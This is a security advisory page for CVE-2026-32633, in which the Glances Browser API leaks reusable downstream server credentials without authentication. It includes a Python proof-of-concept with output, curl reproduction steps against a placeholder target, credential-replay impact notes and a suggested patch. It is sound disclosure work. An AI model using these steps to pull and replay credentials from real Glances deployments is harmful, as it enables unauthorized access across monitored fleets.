Skip to main content

Python CVE-2026-32633

CRITICAL
Information Exposure (CWE-200)
2026-03-16 https://github.com/nicolargo/glances GHSA-r297-p3v4-wp8m
9.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
SUSE
CRITICAL
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 16, 2026 - 17:20 vuln.today
Patch released
Mar 16, 2026 - 17:20 nvd
Patch available
CVE Published
Mar 16, 2026 - 16:35 nvd
CRITICAL 9.1

DescriptionGitHub Advisory

Summary

In Central Browser mode, the /api/4/serverslist endpoint returns raw server objects from GlancesServersList.get_servers_list(). Those objects are mutated in-place during background polling and can contain a uri field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret.

If the front Glances Browser/API instance is started without --password, which is supported and common for internal network deployments, /api/4/serverslist is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance.

Details

The Browser API route simply returns the raw servers list:

python
# glances/outputs/glances_restful_api.py:799-805
def _api_servers_list(self):
    self.__update_servers_list()
    return GlancesJSONResponse(self.servers_list.get_servers_list() if self.servers_list else [])

The main API router is only protected when the front instance itself was started with --password. Otherwise there are no authentication dependencies at all:

python
# glances/outputs/glances_restful_api.py:475-480
if self.args.password:
    router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
else:
    router = APIRouter(prefix=self.url_prefix)

The Glances web server binds to 0.0.0.0 by default:

python
# glances/main.py:425-427
parser.add_argument(
    '--bind',
    default='0.0.0.0',
    dest='bind_address',
)

During Central Browser polling, server entries are modified in-place and gain a uri field:

python
# glances/servers_list.py:141-148
def __update_stats(self, server):
    server['uri'] = self.get_uri(server)
    ...
    if server['protocol'].lower() == 'rpc':
        self.__update_stats_rpc(server['uri'], server)
    elif server['protocol'].lower() == 'rest' and not import_requests_error_tag:
        self.__update_stats_rest(f"{server['uri']}/api/{__apiversion__}", server)

For protected servers, get_uri() loads the saved password from the [passwords] section (or the default password), hashes it, and embeds it directly in the URI:

python
# glances/servers_list.py:119-130
def get_uri(self, server):
    if server['password'] != "":
        if server['status'] == 'PROTECTED':
            clear_password = self.password.get_password(server['name'])
            if clear_password is not None:
                server['password'] = self.password.get_hash(clear_password)
        uri = 'http://{}:{}@{}:{}'.format(
            server['username'],
            server['password'],
            server['name'],
            server['port'],
        )
    else:
        uri = 'http://{}:{}'.format(server['name'], server['port'])
    return uri

Password lookup falls back to a global default:

python
# glances/password_list.py:55-58
try:
    return self._password_dict[host]
except (KeyError, TypeError):
    return self._password_dict['default']

The sample configuration explicitly supports browser-wide default password reuse:

ini
# conf/glances.conf:656-663
[passwords]
# localhost=abc
# default=defaultpassword

The secret embedded in uri is not the cleartext password, but it is still a reusable Glances authentication credential. Client connections send that pbkdf2-derived hash over HTTP Basic authentication:

python
# glances/password.py:72-74,94
# For Glances client, get the password (confirm=False, clear=True):
#     2) the password is hashed with SHA-pbkdf2_hmac (only SHA string transit
password = password_hash
python
# glances/client.py:56-57
if args.password != "":
    self.uri = f'http://{args.username}:{args.password}@{args.client}:{args.port}'

The Browser WebUI also consumes that raw uri directly and redirects the user to it:

javascript
// glances/outputs/static/js/Browser.vue:83-103
fetch("api/4/serverslist", { method: "GET" })
...
window.location.href = server.uri;

So once server.uri contains credentials, those credentials are not just used internally; they are exposed to API consumers and frontend JavaScript.

PoC

Step 1: Verified local live proof that server objects contain credential-bearing URIs

The following command executes the real glances/servers_list.py update logic against a live local HTTP server that always returns 401. This forces Glances to mark the downstream server as PROTECTED and then retry with the saved/default password. After the second refresh, the in-memory server list contains a uri field with embedded credentials.

bash
cd D:\bugcrowd\glances\repo
@'
import importlib.util
import json
import sys
import threading
import types
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from defusedxml import xmlrpc as defused_xmlrpc

pkg = types.ModuleType('glances')
pkg.__apiversion__ = '4'
sys.modules['glances'] = pkg

client_mod = types.ModuleType('glances.client')
class GlancesClientTransport(defused_xmlrpc.xmlrpc_client.Transport):
    def set_timeout(self, timeout):
        self.timeout = timeout
client_mod.GlancesClientTransport = GlancesClientTransport
sys.modules['glances.client'] = client_mod

globals_mod = types.ModuleType('glances.globals')
globals_mod.json_loads = json.loads
sys.modules['glances.globals'] = globals_mod

logger_mod = types.ModuleType('glances.logger')
logger_mod.logger = types.SimpleNamespace(
    debug=lambda *a, **k: None,
    warning=lambda *a, **k: None,
    info=lambda *a, **k: None,
    error=lambda *a, **k: None,
)
sys.modules['glances.logger'] = logger_mod

password_list_mod = types.ModuleType('glances.password_list')
class GlancesPasswordList: pass
password_list_mod.GlancesPasswordList = GlancesPasswordList
sys.modules['glances.password_list'] = password_list_mod

dynamic_mod = types.ModuleType('glances.servers_list_dynamic')
class GlancesAutoDiscoverServer: pass
dynamic_mod.GlancesAutoDiscoverServer = GlancesAutoDiscoverServer
sys.modules['glances.servers_list_dynamic'] = dynamic_mod

static_mod = types.ModuleType('glances.servers_list_static')
class GlancesStaticServer: pass
static_mod.GlancesStaticServer = GlancesStaticServer
sys.modules['glances.servers_list_static'] = static_mod

spec = importlib.util.spec_from_file_location('tested_servers_list', Path('glances/servers_list.py'))
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
GlancesServersList = mod.GlancesServersList

class Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        _ = self.rfile.read(int(self.headers.get('Content-Length', '0')))
        self.send_response(401)
        self.end_headers()
    def log_message(self, *args):
        pass

httpd = HTTPServer(('127.0.0.1', 0), Handler)
port = httpd.server_address[1]
thread = threading.Thread(target=httpd.serve_forever, daemon=True)
thread.start()

class FakePassword:
    def get_password(self, host=None):
        return 'defaultpassword'
    def get_hash(self, password):
        return f'hash({password})'

sl = GlancesServersList.__new__(GlancesServersList)
sl.password = FakePassword()
sl._columns = [{'plugin': 'system', 'field': 'hr_name'}]
server = {
    'key': f'target:{port}',
    'name': '127.0.0.1',
    'ip': '203.0.113.77',
    'port': port,
    'protocol': 'rpc',
    'username': 'glances',
    'password': '',
    'status': 'UNKNOWN',
    'type': 'STATIC',
}
sl.get_servers_list = lambda: [server]

sl._GlancesServersList__update_stats(server)
sl._GlancesServersList__update_stats(server)
httpd.shutdown()
thread.join(timeout=2)
print(json.dumps(sl.get_servers_list(), indent=2))
'@ | python -

Verified output:

json
[
  {
    "key": "target:57390",
    "name": "127.0.0.1",
    "ip": "203.0.113.77",
    "port": 57390,
    "protocol": "rpc",
    "username": "glances",
    "password": null,
    "status": "PROTECTED",
    "type": "STATIC",
    "uri": "http://glances:hash(defaultpassword)@127.0.0.1:57390",
    "columns": [
      "system_hr_name"
    ]
  }
]

This is the same raw object shape that /api/4/serverslist returns.

Step 2: Remote reproduction on a live Browser instance

  1. Configure Glances Browser mode with a saved default password for downstream servers:
ini
[passwords]
default=SuperSecretBrowserPassword
  1. Start the Browser/API instance without front-end authentication:
bash
glances --browser -w -C ./glances.conf
  1. Ensure at least one protected downstream server is polled and marked PROTECTED.
  2. From any machine that can reach the Glances Browser API, fetch the raw server list:
bash
curl -s http://TARGET:61208/api/4/serverslist
  1. Observe entries like:
json
{
  "name": "internal-glances.example",
  "status": "PROTECTED",
  "uri": "http://glances:<pbkdf2_hash>@internal-glances.example:61209"
}

Impact

  • Unauthenticated credential disclosure: When the front Browser API runs without --password, any reachable user can retrieve downstream Glances authentication secrets from /api/4/serverslist.
  • Credential replay: The disclosed pbkdf2-derived hash is the effective Glances client secret and can be replayed against downstream Glances servers using the same password.
  • Fleet-wide blast radius: A single Browser instance can hold passwords for many downstream servers via host-specific entries or [passwords] default, so one exposed API can disclose credentials for an entire monitored fleet.
  • Chains with the earlier CORS issue: Even when the front instance uses --password, the permissive default CORS behavior can let a malicious website read /api/4/serverslist from an authenticated browser session and steal the same downstream credentials cross-origin.

Recommended Fix

Do not expose credential-bearing fields in API responses. At minimum, strip uri, password, and any derived credential material from /api/4/serverslist responses and make the frontend derive navigation targets without embedded auth.

python
# glances/outputs/glances_restful_api.py

def _sanitize_server(self, server):
    safe = dict(server)
    safe.pop('password', None)
    safe.pop('uri', None)
    return safe

def _api_servers_list(self):
    self.__update_servers_list()
    servers = self.servers_list.get_servers_list() if self.servers_list else []
    return GlancesJSONResponse([self._sanitize_server(server) for server in servers])

And in the Browser WebUI, construct navigation URLs from non-secret fields (ip, name, port, protocol) instead of trusting a backend-supplied server.uri.

AnalysisAI

The Glances system monitoring tool exposes reusable authentication credentials for downstream servers through an unauthenticated API endpoint when running in Central Browser mode without password protection. This vulnerability allows any network attacker to retrieve pbkdf2-hashed passwords that can be replayed to access protected Glances servers across an entire monitored fleet. A proof-of-concept is included in the advisory demonstrating credential extraction from the /api/4/serverslist endpoint.

Technical ContextAI

Glances (CPE: pkg:pip/glances) is a Python-based cross-platform system monitoring tool that can operate in a centralized Browser mode to monitor multiple servers. The vulnerability stems from CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor) where the Browser API returns raw server objects containing embedded HTTP Basic authentication credentials in URI fields. These credentials are pbkdf2-derived hashes of the actual passwords stored in the [passwords] configuration section, but remain valid for authentication against downstream Glances instances. The API binds to 0.0.0.0 by default and lacks authentication when started without the --password flag, which is common for internal deployments.

RemediationAI

Upgrade Glances to version 4.5.2 or later, which contains the fix commit 879ef8688ffa1630839549751d3c7ef9961d361e as referenced in the vendor advisory at https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m. Until patching is possible, enable password protection on all Browser instances using the --password flag and restrict network access to the API port (default 61208) through firewall rules. Review and rotate any passwords that may have been exposed through unprotected Browser APIs, as the disclosed pbkdf2 hashes remain valid credentials until passwords are changed.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Vendor StatusVendor

SUSE

Severity: Critical
Product Status
openSUSE Tumbleweed Fixed

Share

CVE-2026-32633 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy